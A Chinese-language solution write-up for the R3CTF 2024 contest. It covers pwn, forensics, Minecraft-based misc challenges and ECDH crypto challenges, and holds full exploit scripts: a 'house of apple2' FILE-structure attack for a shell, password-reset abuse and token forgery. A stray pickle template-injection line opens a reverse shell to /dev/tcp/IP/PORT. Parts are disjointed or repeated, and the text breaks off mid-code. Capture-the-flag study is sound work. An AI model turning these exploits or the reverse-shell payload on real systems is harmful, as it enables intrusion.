R3CTF2024 WP

一、PWN

1.Nullullullllu

在直接给 libc_base 的情况下，一次任意地址写 \x00 。

直接修改 IO_2_1_stdin 的 _IO_buf_base 末尾为 \x00 ，那么 _IO_buf_base 就会指向 IO_2_1_stdin 的 _IO_write_base，接下来就是利用 getchar 函数触发写操作修改 IO_buf_base 为 IO_2_1_stdout ，再次利用 getchar 函数触发写操作写 apple2 进 stdout ，printf 函数执行时候会触发 appl2 get shell。

exp

from pwn import *
from struct import pack
from ctypes import *
import base64
from subprocess import run
#from LibcSearcher import *
from struct import pack
import tty

def debug(c = 0):
    if(c):
        gdb.attach(p, c)
    else:
        gdb.attach(p)
        pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa  = lambda text,data  :p.sendafter(text, data)
sl  = lambda data   :p.sendline(data)
sla = lambda text,data  :p.sendlineafter(text, data)
r   = lambda num=4096   :p.recv(num)
rl  = lambda text   :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter   = lambda        :p.interactive()
l32 = lambda    :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda    :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32    = lambda    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data   :int(data,16)
lg= lambda s, num   :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')
p = remote('ctf2024-entry.r3kapig.com', 30371)
#p = remote('127.0.0.1', 9999)
elf_patch = './chall'
#p = process(elf_patch)
elf = ELF(elf_patch)
libc = ELF('./libc.so.6')

sla(b'> ', b'1')
rl(b'0x')
libc_base = int(r(12), 16)# + 0x6d80

environ = libc_base + libc.sym['__environ']
system, binsh = get_sb()
stdin = libc_base + libc.sym['_IO_2_1_stdin_']
stdin_IO_buf_base = stdin + 7*8
stdin_old_value = stdin + 0x83
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
stderr = libc_base + libc.sym['_IO_2_1_stderr_']

# step 2 : printf -> stdout -> house of apple2
system, binsh = get_sb()
_IO_wfile_jumps = libc_base + 0x202228

base_addr = stdout

fake_io = b'  sh;\x00\x00\x00' 
fake_io = fake_io.ljust(0x68, b'\x00')
fake_io += p64(system)
fake_io = fake_io.ljust(0x88, b'\x00')
fake_io += p64(base_addr + 0x5000) # _lock
fake_io += p64(0)*2
fake_io += p64(base_addr)
fake_io = fake_io.ljust(0xd8, b'\x00')
fake_io += p64(_IO_wfile_jumps - 0x20)
fake_io = fake_io.ljust(0xe0, b'\x00')
fake_io += p64(base_addr)

sla(b'> ', b'2')
sla(b'Mem: ', hex(stdin_IO_buf_base))

#debug('b *$rebase(0x12c3)')

sa(b'> ', p64(stdin_old_value)*3 + p64(base_addr) + p64(base_addr + len(fake_io) + 1))

sleep(1)
sl(fake_io)

lg('libc_base', libc_base)

inter()
pause()

二、Forensic

1.TPA 01

e01镜像 直接丢进火眼 分析出个嵌套证据

其实做这个题的时候分析过程还挺复杂的 感觉想的过于复杂了 归其原因还是经验太少 我甚至仿真起来了

翻文件夹的时候找到wsl 在结合嵌套证据 感觉预期解应该是要把这个系统恢复出来

但是好在有取证工具 不用恢复出来也可以做 下面就是由于我翻文件系统不仔细发现的另一种途径

010直接把密文翻出来了

但是在火眼里面直接能看到 还能看到一个关于密钥的提示

key：
Do you like watch videos on youtube?Something fun there:https://www.youtube.com/@d3f4u1t-lolol

F14G：
Hi players,welcome !Ops,what's that?2d422fc7f2c628c55520984c0673964eb5454dea72f79b1022a34728294c5bf8I guess u need a key to decrypt it.SELECT something FROM somewhere with the windows10 lol~

根据提示 SELECT something FROM somewhere 想到应该和sql语句有点关系

先看一下key里面提到的视频

有个字符串 提出来看看

0x6d617962652075206e6565642c746861742773206e6f74206162736f6c7574650a726f6f743a5040357357307264466f7255

maybe u need,that's not absolute
root:P@5sW0rdForU

给了个密码 尝试登陆mysql 成功登陆

select * from secret;

FFD8的头 一眼jpg图片 保存下来 给出了AES解密的key

其实这里也可以用一个项目ibd2sql来解密数据库secret.ibd也可以

2.TPA 02

两部分 一个是找攻击者的手机号码 一个是找Peggy的登陆密码

先看流量 直接追踪tcp流 在第31个流 找到login登录页面

第一段flag从安卓手机存储手机短信的地方找

再看给的手机文件夹 直接用火眼分析 分析出两个手机号

根据语境 可以得知是15555215556这个号码应该是Peggy的同事 来询问Peggy是否也收到了钓鱼信息

那下面的15555215558 应该就是攻击者的手机号码 直接组合起来

r3ctf{15555215558_l0v3_aNd_peace}

三、Misc

1.Blizzard CN Restarts

利用shadoweditor

2.hideAndSeek

Ben is a superpower who loves playing hide and seek. He can teleport to anywhere to no one can find him, but he seems unaware that his ability only works within a certain range

Rules:

The adorable Ben will only appear within the range of (0, -50, 0) to (128, 50, 128).
Ben will every 10 seconds and reappear in a new location after 10 seconds.
A "newtp" has been added for all players to teleport to any coordinates.
Connect info: 34.81.163.238

version 1.19.2

很抽象的mc游戏题 开始确实是用PCL2模拟器进入游戏去玩

看到给了个newtp命令 还查了很多教程去学MC的tp命令是如何使用 但是发现没啥用 在地图里面逛了一会儿

用newtp大概传送了一些坐标 命令格式如下

想传送到的坐标(x, y, z)
newtp x y z

后面直接翻log日志文件 找到flag

读日志可以发现 这个”Ben”的尸体类型应该是村民 并且他的名称就是flag

R3CTF{Jus7_play_m0r3_h1de_2nd_seek_w1th_Ben}

3.Transit

搜索到b站视频上的封面，和拍摄地高度相似，查找19号线沿线pov BV1ie411M7av这个视频32s就是拍摄地，逐帧播放在3:35处找到 R3CTF{hangzhou_zhixing_road_station}

hint:S1611 and S1613 may the number of signal light, not the trains. https://www.cnblogs.com/QQ2962269558/p/12743383.html

用上行（S）与下行（X）来定义列车的运行方向。可能是电力驱动的动车组

4.Thief

大于0.85肯定就是1：

from pwn import *

p = remote('ctf2024-entry.r3kapig.com',31395)
for i in range(500):

    a = p.recvuntil(b'top_10_pred : [')
    b = p.recvuntil(b']')
    b = b.decode().replace('[','').replace(']','').split(',')
    c = float(b[0])
    if c >= 0.9:
        p.sendlineafter(b'Is this picture in the training set?',b'1')
    else:
        p.sendlineafter(b'Is this picture in the training set?',b'0')
    print(f'no.{i}={c},num={num}')
flag = p.recvline()
print(flag)
p.close()

当然，范围可以做合理的改变

R3CTF{caIN_liKe_A1_4nd_rEC_8772b609d39f}

5.hideAndSeek

开挂秒了

非常好村民，使我的透视+追踪旋转

6.h1de@ndSe3k

MC在渲染区块的时候会有日志记录

查看日志就可以秒了

使用CE检查java.exe进程中有诸多'R3CTF'，'r3ctf','flag'字眼，推测村民名字在内存中明文存储，跑图后

P.S.:经测试发现，只有装载旅行地图(journeymap-1.19.2-5.9.8-fabric)后才能在内存中找到村民name，旅行地图上大分（journeymap记录一些生物nbt很合理吧。。？

或者直接爆破flag就行（）

7.behind the WALL

def callback(re):
    re=5
    re=getattr(getattr(getattr('a',f"e{f"n"}c{f"o"}d{f"e"}")(),f"f{f"r"}o{f"m"}h{f"e"}x")(f'{re}f'),f"d{f"e"}c{f"o"}d{f"e"}")()
    print(getattr(gc,f"g{f"e"}t{re}o{f"b"}j{f"e"}c{f"t"}s")(2)[2])
    
# 970064017d000200740100000000000000000200740100000000000000000200740100000000000000006402640364049b00640564069b00640764039b009d06ab02000000000000ab00000000000000640864099b006406640a9b00640b64039b00640c9d07ab020000000000007c009b0064089d02ab01000000000000640764039b00640564069b00640764039b009d06ab02000000000000ab000000000000007d007403000000000000000002007401000000000000000074040000000000000000640d64039b00640e7c009b006406640f9b00641064039b006405640e9b0064119d0bab020000000000006412ab01000000000000641219000000ab0100000000000001007900
# None,5,a,e,n,c,o,d,f,r,m,h,x,g,t,b,j,s,2
# getattr,print,gc
# 17

四、Crypto

1.r0system

审计代码发现，可以自己注册个账号完成登录

登录之后，在修改密码那里居然可以改所有用户的密码

def R0System(USERNAME): 
    global login_tag,PublicChannels
    option = int(input((b"Hello "+ USERNAME + b",do you need any services? ").decode()))
    if option == 1:
        username     = bytes.fromhex(input(b"Username[HEX]: ".decode())) 
        new_password = bytes.fromhex(input(b"New Password[HEX]: ".decode()))
        tag,msg = USER.reset_password(username,new_password)
        print(msg.decode())

那思路就是改Bob的密码，然后得到Bob的私钥，再求Alice和Bob的会话密钥完成解密

class Curve: 
    def __init__(self):
        # Nist p-256
        self.p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
        self.a = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296, 
                  0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
        self.n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551

    def add(self,P, Q):
        if (P == (0, 0)):
            return Q
        elif (Q == (0, 0)):
            return P
        else: 
            x1, y1 = P
            x2, y2 = Q
            if ((x1 == x2) & (y1 == -y2)):
                return ((0, 0))
            else:
                if (P != Q):
                    l = (y2 - y1) * pow(x2 - x1, -1, self.p)
                else:
                    l = (3 * (x1**2) + self.a) * pow(2 * y1, -1, self.p)
            x3 = ((l**2) - x1 - x2) % self.p
            y3 = (l * (x1 - x3) - y1) % self.p
            return x3, y3

    def mul(self, n , P):
        Q = P
        R = (0, 0)
        while (n > 0):
            if (n % 2 == 1):
                R = self.add(R, Q)
            Q = self.add(Q, Q)
            n = n // 2
        return R
    
    
from Crypto.Util.number import long_to_bytes,bytes_to_long,isPrime
from hashlib import md5
from Crypto.Cipher import AES

curve = Curve()
p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
a = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
# E = EllipticCurve(GF(p),[a,b])
n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551

G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296, 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
encflag = "e3b70f0fc960e3cc28f5b02667e5483f6dd6cc267435d33cd222071f949da4a9fc383ad4282a28c81c8b106546b0dc5e61b0908f6d0edb07a2072a9f3b3c0a2aa4b990d1a903b33e5921336f68533b7fce5cd401816016e369e6941336dcf441"
tmpA = "ce760c0651d6f4e7466173d5bebe4803af2b0aea75ebb1948785e50fd1c911f18f887c172dd64d979fc501b13c5e76418e24920671610563bb0233fc1cf1a789"
tmpB = "fc7ac593d124c0f5c10ed04623c5d5e80bc4af3215956cba0dcf27d9a6a7e11b4412f38ef83403e9a844e11fbc349b05795808a38cb90b99dbb165c54aa38ba2"

Ax = bytes.fromhex(tmpA)[:32]
Ay = bytes.fromhex(tmpA)[32:]
Bx = bytes.fromhex(tmpB)[:32]
By = bytes.fromhex(tmpB)[32:]
A = (bytes_to_long(Ax),bytes_to_long(Ay))
B = (bytes_to_long(Bx),bytes_to_long(By))

b = 0x4627ff9ebfc02af8e8b2eb2a276ac028d874de10df417221d49d838bc6a5e733
KEY = md5(str(curve.mul(b,A)).encode()).digest()

aes = AES.new(KEY,AES.MODE_ECB)
flag = aes.decrypt(bytes.fromhex(encflag))
print(flag)
# R3CTF{p3rm1$sions_n33d_Att3nt1%n!_NeXt_l3vE1_l1Nk_1s_https://reurl.cc/Vz7GzZ_a702ba611b24}

2.r1system

上一题做完之后，拿到这题的附件

审计完代码发现，这题和上题区别在于，这题初始化只有Alice一个账号，而且我们居然能注册Bob的账号

注册之后和Alice交换密钥就好了

from Crypto.Util.number import long_to_bytes,bytes_to_long,isPrime
from hashlib import md5
from Crypto.Cipher import AES

encflag = "b421ed525e970681412ade94b2c9eeb5365d0cec75fed997525ce31fe8878dac9f4ea3992a5e54c27acfd81d456cc8ae27ff666c470637067e05d73cd53d2da1"
key = "4b257eda7fda459a7844014378f08b8e"

aes = AES.new(bytes.fromhex(key),AES.MODE_ECB)
flag = aes.decrypt(bytes.fromhex(encflag))
print(flag)
# R3CTF{pRN9_I1k3_qc9_1S_3Z_To_50IVe_38e5d6dd3eaa}

3.flag

使用生成函数知识

因为

而后面的式子至多有2**18项，直接暴力算出每一项然后代入公式即可

from Crypto.Util.number import *
from sympy import *

def coef(x):
    if x < 0:
        return 0
    c=18
    ret=1
    x+=c-1
    for i in range(c-1):
        ret *= x-i
    for i in range(c-1):
        ret = ret // (i + 1)
    return ret

def run(k, n):
    if n < 0:
        return 0
    if k == 19:
        return coef(n)
    t = (k+1)//2
    return run(k+1,n-2**t) - run(k+1,n-2**(t+10)-1)

p0=run(1,2**20-ord(""))
p=nextprime(p0)
n = 162917824250624428770847214526766153715994730770828294223045145782361053118639752515448191168318791581379714281400019977395626358004912238500194006293059
c = 122406161670580331591403173748658855680897827252661396790491763445171793944030771193413106560964524799938825689332487037104687390956044492567123541927155
q=n//p
phi=(p-1)*(q-1)
d=inverse(65537,phi)
m=pow(c,d,n)
flag=long_to_bytes(m)
print(flag.decode())

md5(md5('admin'+timestamp).upper())
Math.random().toString(36)
keccak256(bytes32(account) + bytes32(4))
keccak256(起始slot + index)
--experimental-permission
0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3
mov eax, 1 ; retn


{{user.parse_raw('c__builtin__\neval\np0\n(V__import__("os").system("/bin/bash -c \'bash -i >& /dev/tcp/IP/PORT 0>&1\'")\np1\ntp2\nRp3\n.',content_type='pickle',allow_pickle=True)}}

六、Crypto

1.r0system

题目源码：

from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Util.number import *
import gmpy2
from pwn import *

AliceUsername = b'AliceIsSomeBody'
BobUsername   = b'BobCanBeAnyBody'

context.log_level = 'DEBUG'
sh = remote('ctf2024-entry.r3kapig.com',31781)
sh.recvuntil(b'Now input your option: ')
sh.sendline(b'3')
sh.recvuntil(b'Username[HEX]: ')
sh.sendline(b'try1'.hex().encode())
sh.recvuntil(b'Password[HEX]: ')
sh.sendline(b'try2key'.hex().encode())
sh.recvuntil(b"Register successfully, try1 's token is ")
try1token = int(sh.recvuntil(b'.\n')[:-2],16)
# print(try1token)
sh.recvuntil(b"Now input your option: ")
sh.sendline(b'1')
sh.recvuntil(b'Username[HEX]: ')
sh.sendline(b'try1'.hex().encode())
sh.recvuntil(b'Password[HEX]: ')
sh.sendline(b'try2key'.hex().encode())
sh.recvuntil(b'Login successfully!\n')


sh.recvuntil(b'Hello try1,do you need any services? ')
sh.sendline(b'1')
sh.recvuntil(b'Username[HEX]: ')
sh.sendline(BobUsername.hex().encode())
sh.recvuntil(b"New Password[HEX]: ")
sh.sendline(b'Bob11'.hex().encode())
sh.recvuntil(b",do you need any services? ")
sh.sendline(b'1')
sh.recvuntil(b'Username[HEX]: ')
sh.sendline(AliceUsername.hex().encode())
sh.recvuntil(b"New Password[HEX]: ")
sh.sendline(b'Alice11'.hex().encode())

sh.recvuntil(b",do you need any services? ")
sh.sendline(b'5')
sh.recvuntil(b"Now input your option: ")
sh.sendline(b'1')
sh.recvuntil(b"Username[HEX]: ")
sh.sendline(AliceUsername.hex().encode())
sh.recvuntil(b"Password[HEX]: ")
sh.sendline(b'Alice11'.hex().encode())

sh.recvuntil(b",do you need any services? ")
sh.sendline(b'3')
sh.recvuntil(b",do you need any services? ")
sh.sendline(b'4')
sh.recv()

解题wp:

from Crypto.Util.number import *
Alice_pub = '632d947f774d6f4c0f462233682bab1e2305976b35b89fef050aa7dfb516885b4d5c6e46c1c0c9427a5c82539aaa18a99cc4ba1adafbacdc860f0d88eedd2713'
Bob_pub = '364d168180a928286d448bceb0b06ca186da0968469b5e4ffa88fcd91929e3345dcf724620318dc3f45b84c9849c43874cb02a53afea98db59b6c8a09070f0f3'
c = 'e3a583dfd51a1278c4e49ddce9fcf606af78a2d02a0a804c6b8b2a3deae301a9df7ff8fdfa0b115378f771eec6f54dade6730ea6d3ab460973f2345aa8fc2ae53e1f47e9cfa9f32ab1e11e1863f65b40e5b01831c0c0ab092b9af9ebaaa3035f'
Alice_pri = int('cd2a4b358441c00c43d966b28612c2233c649b6f648b35c97422f985e5c2dffa',16)
print(len(Bob_pub))

def b2i(b):
    return int.from_bytes(b,byteorder='big')

def pad(msg):
    return msg + bytes([i for i in range(16 - int(len(msg) % 16))])

class Curve:
    def __init__(self):
        # Nist p-256
        self.p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
        self.a = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
                  0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
        self.n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
    def add(self,P, Q):
        if (P == (0, 0)):
            return Q
        elif (Q == (0, 0)):
            return P
        else:
            x1, y1 = P
            x2, y2 = Q
            if ((x1 == x2) & (y1 == -y2)):
                return ((0, 0))
            else:
                if (P != Q):
                    l = (y2 - y1) * pow(x2 - x1, -1, self.p)
                else:
                    l = (3 * (x1**2) + self.a) * pow(2 * y1, -1, self.p)
            x3 = ((l**2) - x1 - x2) % self.p
            y3 = (l * (x1 - x3) - y1) % self.p
            return x3, y3

    def mul(self, n , P):
        Q = P
        R = (0, 0)
        while (n > 0):
            if (n % 2 == 1):
                R = self.add(R, Q)
            Q = self.add(Q, Q)
            n = n // 2
        return R

class ECDH:
    def __init__(self):
        self.curve = Curve()
        self.private_key = Alice_pri
        self.public_key  = self.curve.mul(self.private_key, self.curve.G)
    def exchange_key(self,publickey):
        return md5(str(self.curve.mul(self.private_key,publickey)).encode()).digest()

def enc(msg,key):
    aes = AES.new(key,AES.MODE_ECB)
    return aes.decrypt(msg)

pub = (int(Bob_pub[:64],16),int(Bob_pub[64:],16))
K = ECDH()
key = K.exchange_key(pub)

m = enc(long_to_bytes(int(c,16)),key)
print(m)

2.r1system

直接注册Bob的账号，python交互不知道为啥会断开，手动交互吧

from Crypto.Util.number import *
from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Util.number import *
import gmpy2

Alice_pub = '4a215c357541eeb3e55bd2ec965a4d8482f737c875eb0b3cbaa8c7d3f242f43ed107e6be779aa9beca0e7a7730edacd258af9a42668f66689dc64f93b7c253ad'
Bob_pub = '0dd29bca4ad78a4c3db149ad2a2eceab7915e7edcacabb904518256d7d16fa4ca6014a0adc7933444ccd43d0ef53135bd298c64bfa4ac45ee3ce26924fffd07b'
c = 'ffec0914ffeacda46c41d64c5bcf80f8d70fa0d48fa3f2f0cdbad88524fc6f47bc31ebceae0a441f3d56d6be438f39897ffbb68308b60ce2f32e6d3186375b1d'
Bob_pri = int('01a0ed4997b932229e13475a876758114ce1c737f22125fe053c802a74503a7f',16)
# print(len(Bob_pub))

def b2i(b):
    return int.from_bytes(b,byteorder='big')

def pad(msg):
    return msg + bytes([i for i in range(16 - int(len(msg) % 16))])

class Curve:
    def __init__(self):
        # Nist p-256
        self.p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
        self.a = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
                  0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
        self.n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
    def add(self,P, Q):
        if (P == (0, 0)):
            return Q
        elif (Q == (0, 0)):
            return P
        else:
            x1, y1 = P

            x2, y2 = Q
            if ((x1 == x2) & (y1 == -y2)):
                return ((0, 0))
            else:
                if (P != Q):
                    l = (y2 - y1) * pow(x2 - x1, -1, self.p)
                else:
                    l = (3 * (x1**2) + self.a) * pow(2 * y1, -1, self.p)
            x3 = ((l**2) - x1 - x2) % self.p
            y3 = (l * (x1 - x3) - y1) % self.p
            return x3, y3

    def mul(self, n , P):
        Q = P
        R = (0, 0)
        while (n > 0):
            if (n % 2 == 1):
                R = self.add(R, Q)
            Q = self.add(Q, Q)
            n = n // 2
        return R

class ECDH:
    def __init__(self):
        self.curve = Curve()
        self.private_key = Bob_pri
        self.public_key  = self.curve.mul(self.private_key, self.curve.G)
    def exchange_key(self,publickey):
        return md5(str(self.curve.mul(self.private_key,publickey)).encode()).digest()

def enc(msg,key):
    aes = AES.new(key,AES.MODE_ECB)
    return aes.decrypt(msg)

pub = (int(Alice_pub[:64],16),int(Alice_pub[64:],16))
K = ECDH()
key = K.exchange_key(pub)

m = enc(long_to_bytes(int(c,16)),key)
print(m)

3.r2system

https://eprint.iacr.org/2023/305.pdf

伪造token，伪造成功

# https://eprint.iacr.org/2023/305.pdf
# https://7rocky.github.io/en/ctf/other/corctf/qcg-k/
from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Util.number import *
import gmpy2
from pwn import *

AliceUsername = b'AliceIsSomeBody'
BobUsername   = b'BobCanBeAnyBody'
MOD  = 0x10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000283
context.log_level = 'DEBUG'
while 1:
    sh = remote('ctf2024-entry.r3kapig.com','31886')
    token = []

    def b2i(b):
        return int.from_bytes(b,byteorder='big')

    for i in range(10):
        sh.recvuntil(b'Now input your option: ')
        sh.sendline(b'3')
        sh.recvuntil(b'Username[HEX]: ')
        sh.sendline(f'try{i}'.encode().hex().encode())
        sh.recvuntil(b'Password[HEX]: ')
        sh.sendline(b'trykey'.hex().encode())
        sh.recvuntil(f"Register successfully, try{i} 's token is ".encode())
        token.append(int(sh.recvuntil(b".\n")[:-2],16))
        # print(token)
        # print(f'try{i}'.encode().hex())
        # print(b'trykey'.hex())
        # print('-'*60)


    from functools import cache
    from sage.all import GF, PolynomialRing
    from Crypto.Util.number import *

    def k_ij(i, j):
        return x * (pow(token[i],-1,q) - pow(token[j],-1,q)) + (-u[i]) - (-u[j])

    def dpoly(n, i, j):
        if i == 0:
            return k_ij(j + 1, j + 2) ** 2 - k_ij(j + 2, j + 3) * k_ij(j, j + 1)

        left = dpoly(n, i - 1, j)
        for m in range(1, i + 2):
            left *= k_ij(j + m, j + i + 2)

        right = dpoly(n, i - 1, j + 1)
        for m in range(1, i + 2):
            right *= k_ij(j, j + m)

        return left - right


    q = 179769313486231590772930519078902473361797697894230657273430081157732675805500963132708477322407536021120113879871393357658789768814416622492847430639474124377767893424865485276302219601246094119453082952085005768838150682342462881473913110540827237163350510684586298239947245938479716304835356329624224137859
    Fq = GF(q)
    x = PolynomialRing(Fq, 'x').gens()[0]
    u = []
    for i in range(10):
        token[i] = Fq(token[i])
        u.append(int(f'try{i}'.encode().hex(),16))

    N = 10
    pol = dpoly(N - 4, N - 4, 0)
    secret = pol.roots()
    print(len(secret))
    if len(secret) == 2:
        print('-'*60)
        print(token)
        print(secret[1][0])
        print(pol.roots())
        q = 179769313486231590772930519078902473361797697894230657273430081157732675805500963132708477322407536021120113879871393357658789768814416622492847430639474124377767893424865485276302219601246094119453082952085005768838150682342462881473913110540827237163350510684586298239947245938479716304835356329624224137859
        # token = [106059497226230078458408573548321522716731725799788329078185586313815926198786283229056460822188793913821381666495251726267106621314658816426114026202874264301311981366174550459244596265305815754933877853234119479492566891678520638945193574839652838841897044204741673519677458754474366826547057897515026724848, 47779134463461938926784751047825979292269094946568692939404713492011230117629761155779851181457396929641936224158552994587078896758215173995601320993839406108967926874172990659955225199974449650174420457407282282200571423658580354611757483081890798193660712063358386112539821026744968444515622130726900239736, 6019943175433302947934690873635058162287681100248021727464564163519392818412390410331290937835893162877644138873871237079538825688146346220557440276548235811524529326955065109956245587384883118646717417832321909917952062203568707642969977550858219727897942030447721296260910991378960446932119401177088481101, 87366091011617621011994203682638757774549496014511565786019048885633795608534406810797304904842442962750474688522542125102222205045224867671241373679622534023429816640889029782226330278878222739729367046959641320415162583370782941515441049046525274560503163657767716097889995000902550291930655118630272187236, 162253270840664463417218196571085196871091797499865805208031509772425458817614063479197094963500577594095925971402551698239212052148910616858817156373954657472523576731428256448818335996409727698745257604493772170217937612767064335133206868791051299144418047833021240318645816550420294524729988468480435887497, 16316159479225612300545615409718990694205381146382791061875851500122541211303872430537288252492644632122096208526557818206957172949606411140810284034078506052569405921204754742275767216885404857318557969754723282586567318942107713278795011776474047765849328695928938150210465524196392099313042988854140728571, 110684449328943736291261911386113967696573864578481873880367217362009886560991405747198017836213552234301282996693430383750292263465467888387505858193619361586819843726572232285738123704133886101707221931680558660384074855076241699302349982605324147403540584525624326285095590160394006554279025380946081520300, 7356599452619556773251194532777561267773145160514835573833588213879013017196468709171138802612399590197923948339027347406993627143242196724078569150122270247338513256791925724480915374824804344499044323246127533120391390418146580877249943216801651260909727234265972977871490098310852917404374165851771600054, 79378643533773177910480239060210987694532674099080062811324829674731184600353273644681398671779081023781611203106498867926311834788227689646072834319606886671941281030178549230498622518109279323029421140996969495153113038798152281011121979052267716458401937806197678273055467808912219079291805483775278618402, 110179524962782493054573311837314282098980987859591882395423393533138851596355452556474077550143760118285004986723362769018067819061818008647687561164809569238857587591201709593890657073827773089305542908925988851353176471460589495509823945721749989059560328268409542559444192460370913632249416427930608028847, 35384376988896111495552489453762246315478997052680054073836682930332914874238114867688834674464731577039550267819156800221016033350889962187366758327534596906583466852055407646306410231870664867147693493193476597590756070907821288287575690452983279436282212713311407594154490312755517436369884174770742549861]

        se = int(secret[1][0])
        Fq = GF(q)
        x = PolynomialRing(Fq, 'x').gens()[0]

        u = []
        for i in range(10):
            token[i] = Fq(token[i])
            u.append(int(f'try{i}'.encode().hex(), 16))

        k = []
        for i in range(10):
            # print(i)
            k.append((-u[i]) + se*pow(token[i],-1,q) % q)

        a = matrix(Fq,8,8)
        for i in range(8):
            for j in range(8):
                a[i,j] = k[i]^(7-j) % q

        inverse_matrix0 = a^(-1)
        k_solve0 = vector(k[1:9])

        result_matrix0 = inverse_matrix0 * k_solve0
        AA = result_matrix0[::-1]
        print(AA)
        if AA[-2] == 0 and AA[-1] == 0:
            continue

        print(k[1],k[2])
        sum = 0
        for i in range(8):
            sum += AA[i]*(k[1]^i) % q
        print(sum)

        s = 0
        for i in range(8):
            s += AA[i]*(k[-1]^i) % q

        Bob_token = se*pow(s+bytes_to_long(BobUsername),-1,q)  % q

        sh.recvuntil(b'Now input your option: ')
        sh.sendline(b'1')
        sh.recvuntil(b'Username[HEX]: ')
        sh.sendline(f'try0'.encode().hex().encode())
        sh.recvuntil(b'Password[HEX]: ')
        sh.sendline(b'trykey'.hex().encode())
        sh.recvuntil(b",do you need any services? ")
        sh.sendline(b'5')

        sh.recvuntil(b'Now input your option: ')
        sh.sendline(b'2')
        sh.recvuntil(b'Username[HEX]: ')
        sh.sendline(BobUsername.hex().encode())
        sh.recvuntil(b"Token[HEX]: ")
        sh.sendline(hex(Bob_token)[2:].encode())

        sh.recvuntil(b",do you need any services? ")
        sh.sendline(b'4')

        sh.recvuntil(b",do you need any services? ")
        sh.sendline(b'3')
        sh.recv()
        break
    sh.close()

解题wp:
from Crypto.Util.number import *
from hashlib import md5
from Crypto.Cipher import AES
from Crypto.Util.number import *
import gmpy2

Alice_pub = '2f964b3572232b1b6059c8994cb99287134e6545693320ff676d09d9b304686d8d8ac7e2ebefa2edcd5df186efdcd45ea755edab77593f64e25fdbf6e79d754b'
Bob_pub = 'aa8b8272443ec7e941197729996a86a121d4f635e584858f0152de2bb983bf295a6ff58354cb89d23318b3490f3c76cd633686a00f6c82e9eb54fbe621bc44cf'
c = 'f7eb15c02d440c835677e0d884ff559b93e1bb96a1821f1221545affaa6ba5eec39982110f1971b8d2e75a3b35ce585fb5f75ed360bd2eeb23a9dbaedfa27fc171b5ba3ac923ab6b835ac0be0e6c7b2c'
Bob_pri = int('97947336c7e877ed359f4268074bf9cbd4788bcd5a160cbea1e95b5d2516d7dc',16)
# print(len(Bob_pub))

def b2i(b):
    return int.from_bytes(b,byteorder='big')

def pad(msg):
    return msg + bytes([i for i in range(16 - int(len(msg) % 16))])

class Curve:
    def __init__(self):
        # Nist p-256
        self.p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
        self.a = 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc
        self.b = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
        self.G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
                  0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
        self.n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
    def add(self,P, Q):
        if (P == (0, 0)):
            return Q
        elif (Q == (0, 0)):
            return P
        else:
            x1, y1 = P
            x2, y2 = Q
            if ((x1 == x2) & (y1 == -y2)):
                return ((0, 0))
            else:
                if (P != Q):
                    l = (y2 - y1) * pow(x2 - x1, -1, self.p)
                else:
                    l = (3 * (x1**2) + self.a) * pow(2 * y1, -1, self.p)
            x3 = ((l**2) - x1 - x2) % self.p
